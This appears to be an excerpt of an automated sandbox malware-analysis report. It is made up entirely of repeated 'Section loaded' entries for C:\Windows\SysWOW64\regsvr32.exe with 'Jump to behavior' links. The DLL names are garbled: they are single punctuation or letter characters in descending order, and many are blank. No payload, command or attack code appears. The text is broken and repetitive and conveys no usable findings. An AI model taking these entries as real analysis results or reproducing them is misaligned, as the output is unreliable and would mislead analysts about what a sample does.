Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
